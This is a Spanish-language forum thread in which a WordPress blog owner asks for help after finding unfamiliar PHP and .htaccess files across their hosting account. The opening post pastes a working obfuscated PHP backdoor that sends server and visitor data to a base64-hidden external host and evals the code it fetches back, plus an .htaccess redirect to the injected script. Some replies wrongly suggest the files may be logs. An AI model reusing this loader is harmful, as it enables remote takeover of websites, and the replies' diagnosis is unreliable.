Ayuda, mi blog de hip hop se ha caído y encontré archivos sospechosos

Plaga Seguir
Seguidores
5

Moderador
1
Sigma
Verificado
Verificación en dos pasos activada
Verificado por Whatsapp
¡Ha verificado su Paypal!
Verificado por Binance
¡Excelente comerciante!
Suscripción a IA
Desde
15 Abr 2009
Mensajes
10.948
Mi blog no se veia, ayuda con archivos sospechosos.

Bueno tengo un problema con mi blog de hip hop, lo que pasa es que hoy que entre veo que no se ve nada, simplemente sale una pagina en blanco y no se cual haya sido el problema, yo no toque nada si puse plugins ni nada por el estilo :( simplemente hoy por la mañana así aparecio, y lo que note también es que en mi host aparecieron unos archivos .php muy extraños los cuales tienen nombre como 216580.php, 103272.php

Y tienen el codigo:

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="53314ab123f0ac117681f01f98f07eb3") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

Y también en cada carpeta de aparecieron archivos .htaccess
con el codigo:
PHP:
Options -MultiViews
ErrorDocument 404 //rapenmexico.com/index/wp-content/87366.php

Por el momento he borrado cada uno de eses elementos de mi sitio de hip hop, pero en todas las demás carpetas de mi cuenta de hostgator estan esos archivos.

Que hago?
Porque aparecieron?
Me comunico con el soporte de hostgator?
AYUDA por favor
 
Última edición:

Mustang

Préstamo
Eta
Verificación en dos pasos desactivada
Desde
10 Abr 2009
Mensajes
1.347
Por favor, ten en cuenta 📝 que si deseas hacer un trato 🤝 con este usuario, está baneado 🔒.
Tiene mucho eso?

Yo lo veo bien, es rapenmexico.com/index?
 

Plaga

Moderador
1
Sigma
Verificado
Verificación en dos pasos activada
Verificado por Whatsapp
¡Ha verificado su Paypal!
Verificado por Binance
¡Excelente comerciante!
Suscripción a IA
Desde
15 Abr 2009
Mensajes
10.948
Por el momento el problema esta resulto (Olvide cambiar el titulo del tema) pero quiero saber porque estan esos archivos en mi host.

Por el momento he borrado cada uno de eses elementos de mi sitio de hip hop, pero en todas las demás carpetas de mi cuenta de hostgator estan esos archivos.
Lean bien el tema por favor.
 

silvestre

1
Dseda
Programador
Verificación en dos pasos activada
Verificado por Whatsapp
Suscripción a IA
Desde
18 Ago 2009
Mensajes
1.216
Bueno tengo un problema con mi blog de hip hop, lo que pasa es que hoy que entre veo que no se ve nada, simplemente sale una pagina en blanco y no se cual haya sido el problema, yo no toque nada si puse plugins ni nada por el estilo :( simplemente hoy por la mañana así aparecio, y lo que note también es que en mi host aparecieron unos archivos .php muy extraños los cuales tienen nombre como 216580.php, 103272.php

Y tienen el codigo:



Y también en cada carpeta de aparecieron archivos .htaccess
con el codigo:
PHP:
Options -MultiViews
ErrorDocument 404 //rapenmexico.com/index/wp-content/87366.php

Por el momento he borrado cada uno de eses elementos de mi sitio de hip hop, pero en todas las demás carpetas de mi cuenta de hostgator estan esos archivos.

Que hago?
Porque aparecieron?

Me comunico con el soporte de hostgator?
AYUDA por favor

Dijiste que estaba en blanco, no que estaba saliendo, en cuanto a lo otro lo normal es que notifiques a tu hosting para que hagan algo al respecto. Talvez y solo son algunos logs.
 

Plaga

Moderador
1
Sigma
Verificado
Verificación en dos pasos activada
Verificado por Whatsapp
¡Ha verificado su Paypal!
Verificado por Binance
¡Excelente comerciante!
Suscripción a IA
Desde
15 Abr 2009
Mensajes
10.948
Dijiste que estaba en blanco, no que estaba saliendo, en cuanto a lo otro lo normal es que notifiques a tu hosting para que hagan algo al respecto. Talvez y solo son algunos logs.

Es que no se veia mi blog tan solo salia una pagina en blanco y lo que hice fue borrar cada uno de esos archivos, y que molesto fue ya que hay que borrar en cada carpeta de la instalación de wordpress.

También no se si sea que salieron esos archivos porque me suspendieron mi cuenta ayer :s
 

silvestre

1
Dseda
Programador
Verificación en dos pasos activada
Verificado por Whatsapp
Suscripción a IA
Desde
18 Ago 2009
Mensajes
1.216
Es que no se veia mi blog tan solo salia una pagina en blanco y lo que hice fue borrar cada uno de esos archivos, y que molesto fue ya que hay que borrar en cada carpeta de la instalación de wordpress.

También no se si sea que salieron esos archivos porque me suspendieron mi cuenta ayer :s

Hostgator nunca me ha gustado ... Son muy sensibles :)
 

Gonzalo Castillo

Delta
Diseñador
Verificación en dos pasos desactivada
Desde
24 May 2009
Mensajes
529
Talvez sean logs como dijieron por ahi, o si no alguien entro a tu FTP y los subio jaja.

Hostgator nunca me ha gustado ... Son muy sensibles :)
Si haces las cosas bien no va a pasar nada, a mi me encanta Hostgator, el soporte es de lo mejor y el servicio tambien, nunca tube problemas. Son muy amables y te ayudan sin problemas.

Saludos!
 

Plaga

Moderador
1
Sigma
Verificado
Verificación en dos pasos activada
Verificado por Whatsapp
¡Ha verificado su Paypal!
Verificado por Binance
¡Excelente comerciante!
Suscripción a IA
Desde
15 Abr 2009
Mensajes
10.948
Talvez sean logs como dijieron por ahi, o si no alguien entro a tu FTP y los subio jaja.


Si haces las cosas bien no va a pasar nada, a mi me encanta Hostgator, el soporte es de lo mejor y el servicio tambien, nunca tube problemas. Son muy amables y te ayudan sin problemas.

Saludos!

Pero en cada carpeta de mi cuenta hay dos archivos 1 .php y otro .htaccess :s lo que me preocupa es que vallan a poner algun codigo malicioso en mis sitios :s
 

Gonzalo Castillo

Delta
Diseñador
Verificación en dos pasos desactivada
Desde
24 May 2009
Mensajes
529
Contacta con ellos por medio de Enlace eliminado o simplemente por el CHAT EN VIVO, a mi siempre me solucionaron los problemas y son muy amables. Seguramente te diran que son esos archcivos.

Saludos!
 

¡Regístrate y comienza a ganar!

Beneficios

  • Gana dinero por participar
  • Gana dinero por recomendarnos
  • Descubre ofertas de empleo diariamente
  • Negocios seguros
  • ¡Información premium y más!

Acceder

¿Ya tienes una cuenta? Accede aquí

Arriba